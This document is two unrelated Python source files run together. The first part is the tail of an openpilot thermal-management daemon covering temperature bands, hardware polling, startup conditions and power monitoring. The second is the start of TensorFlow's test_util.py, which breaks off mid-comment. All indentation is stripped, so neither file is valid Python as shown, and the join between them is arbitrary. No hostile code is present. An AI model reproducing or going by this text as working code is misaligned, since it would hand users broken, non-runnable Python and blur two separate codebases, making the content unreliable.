DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5 if TICI else 70.0
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
global tz_by_type
tz_by_type = {}
for n in os.listdir("/sys/devices/virtual/thermal"):
if not n.startswith("thermal_zone"):
continue
with open(os.path.join("/sys/devices/virtual/thermal", n, "type")) as f:
tz_by_type[f.read().strip()] = int(n.lstrip("thermal_zone"))
def read_tz(x):
if x is None:
return 0
if isinstance(x, str):
if tz_by_type is None:
populate_tz_by_type()
x = tz_by_type[x]
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
prev_hw_state = None
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
usb_power = True
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
is_uno = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
usb_power = peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client
# Setup fan handler on first connect to panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
if TICI:
fan_controller = TiciFanController()
elif is_uno or PC:
fan_controller = UnoFanController()
else:
fan_controller = EonFanController()
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.batteryPercent = HARDWARE.get_battery_capacity()
msg.deviceState.batteryCurrent = HARDWARE.get_battery_current()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = (now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
if TICI:
missing = (not Path("/data/media").is_mount()) and (not os.path.isfile("/persist/comma/living-in-the-moment"))
set_offroad_alert_if_changed("Offroad_StorageMissing", missing)
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
msg.deviceState.powerDrawW = current_power_draw if current_power_draw is not None else 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
if EON and not is_uno:
set_offroad_alert_if_changed("Offroad_ChargeDisabled", (not usb_power))
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
if EON and started_ts is None and msg.deviceState.memoryUsagePercent > 40:
cloudlog.event("High offroad memory usage", mem=msg.deviceState.memoryUsagePercent)
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import _pywrap_stacktrace_handler
from tensorflow.python import _pywrap_util_port
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import config
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable MLIR compilation.
def is_mlir_bridge_enabled():
return False
try:
from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable TFRT.
def is_tfrt_enabled():
return False
try:
from tensorflow.python.framework.is_tfrt_test_true import is_tfrt_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
def _get_object_count_by_type():
return collections.Counter([type(obj).__name__ for obj in gc.get_objects()])
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return _pywrap_util_port.IsMklEnabled()
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 3-, 4-, or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {3: [0, 2, 1], 4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
"""Context manager to skip cases not considered failures by the tests.
Note that this does not work if used in setUpClass/tearDownClass.
Usage in setUp/tearDown works fine just like regular test methods.
Args:
test_obj: A test object provided as `self` in the test methods; this object
is usually an instance of `unittest.TestCase`'s subclass and should have
`skipTest` method.
error_type: The error type to skip. Note that if `messages` are given, both
`error_type` and `messages` need to match for the test to be skipped.
messages: Optional, a string or list of strings. If `None`, the test will be
skipped if `error_type` matches what is raised; otherwise, the test is
skipped if any of the `messages` is contained in the message of the error
raised, and `error_type` matches the error raised.
Yields:
Nothing.
"""
if messages:
messages = nest.flatten(messages)
try:
yield
except error_type as e:
if not messages or any(message in str(e) for message in messages):
test_obj.skipTest("Skipping error: {}: {}".format(type(e), str(e)))
else:
raise
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
Args:
func: The function to test.
warmup_iters: The numer of warmup iterations, excluded from measuring.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
f(self, *args, **kwargs)
# Some objects are newly created by _get_object_count_by_type(). So
